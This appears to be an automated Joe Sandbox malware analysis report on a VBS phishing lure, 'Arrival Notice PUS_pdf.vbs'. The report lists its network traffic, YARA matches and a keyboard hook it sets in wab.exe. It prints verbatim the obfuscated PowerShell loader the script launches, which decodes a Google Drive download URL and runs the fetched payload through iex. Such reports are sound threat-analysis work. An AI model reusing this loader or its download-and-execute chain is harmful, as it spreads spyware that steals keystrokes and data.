            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: wscript.exe, 00000001.00000003.1345209659.00000171D0371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346641389.00000171D0334000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b971
            Source: wscript.exe, 00000001.00000003.1346468271.00000171D02E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346289034.00000171D02C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b
            Source: powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRP
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRXR
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download
            Source: powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comhP
            Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Potential malicious VBS script found (suspicious strings)
            Source: Initial file: Unperiphrased.ShellExecute Coinsurable,maengdebegreb,"","" ,Allness139
            Sample has a suspicious name (potential lure to open the executable)
            Source: Arrival Notice PUS_pdf.vbsStatic file information: Suspicious name
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6253
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6253
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6253Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6253Jump to behavior
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886E4C3423_2_00007FF886E4C342
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886E4B5963_2_00007FF886E4B596
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF41F812_2_02EF41F8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF4AC812_2_02EF4AC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF3EB012_2_02EF3EB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AE3BD812_2_28AE3BD8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF68A812_2_28AF68A8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AFEA6912_2_28AFEA69
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF004012_2_28AF0040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF33E812_2_28AF33E8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF89E012_2_28AF89E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AFB5C012_2_28AFB5C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF5AB012_2_28AF5AB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AFAEE012_2_28AFAEE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF911B12_2_28AF911B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_28AF001112_2_28AF0011
            Source: Arrival Notice PUS_pdf.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Australians.HovJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1m15uv.qqi.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7660
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
